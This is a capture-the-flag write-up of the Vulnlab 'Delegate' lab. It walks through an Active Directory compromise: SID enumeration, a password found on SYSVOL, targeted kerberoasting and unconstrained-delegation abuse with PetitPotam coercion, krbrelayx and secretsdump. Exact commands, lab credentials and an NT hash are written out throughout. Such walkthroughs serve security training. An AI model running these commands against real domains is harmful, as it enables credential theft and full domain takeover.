CTF-Writeups/Vulnlab/Delegate.md

Vulnlab - Delegate

Host is up (0.22s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
53/tcp    open  domain     Simple DNS Plus
88/tcp open  kerberos-sec
135/tcp   open  msrpc      Microsoft Windows RPC
139/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
464/tcp   open  tcpwrapped
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after:  2024-03-31T15:47:02
| MD5:   3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp  open
9389/tcp  open  tcpwrapped
47001/tcp open  tcpwrapped
49667/tcp open  tcpwrapped
49669/tcp open  tcpwrapped
49670/tcp open  tcpwrapped
49686/tcp open  tcpwrapped
49691/tcp open  tcpwrapped

Enumerating smb with anonymous user doesn't show any intereting shares

We can however enumerate domain users with lookupsid using a guest account by brute forcing SIDs

lookupsid.py guest@delegate.vl 10000

Having the domain users, we can check if there's any account having pre-authentication disabled which can lead to AS-REP roasting

Checking the shares and accessing SYSVOL share, we can find users.bat file having a password

Spraying this password on the users we have confirms that this password belongs A.Briggs

Running python-bloodhound to enumerate the domain

python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255

From bloodhound we can see `A.Briggs` has `GenericWrite` on `N.thompson`

This can abuse either through Shadow credentials or associating a SPN to N.Thompson for Targeted kerberoasting, I tried with shadow credentials by editing msDS-KeyCredentialLink but due to PKINT notbeing supported by this DC it didn't worked

Attempting to perfrom targeted kerberoasting

python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'

Cracking the hash with hashcat

Since n.thompson has CanPSRemote we can login through WinRM

This user belongs to Delegation Admins but there wasn't ACLs on bloodhound for that group

Checking privileges of this user shows that it has SeEnableDelegationPrivilege enabled

This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn't 0

First creating a machine account with `addcomputer.py`

addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'

Adding dns record for the machine account we created

python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255

Adding a DNS entry for this machine account with dnstool

python3 dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.85.247

To abuse unconstrained delegation the machine needs to have a SPN and TRUSTED_FOR_DELEGATION UAC, using bloodyAD we can add the UAC

python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION

Appending SPN with addspn via msDS-AdditionalDnsHostName

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl

Now running `krbrelayx` by first coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1's TGT which gets stored in the memory of machine account having trusted for delegation enabled for the purpose of accessing resources

python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247

And running krbrelayx with NThash of the machine account

python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC

Having the ticket, we can export it and dump the hashes with secretsdump

secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass

References

• https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting
• https://exploit.ph/user-constrained-delegation.html
• https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
• https://github.com/CravateRouge/bloodyAD
• https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203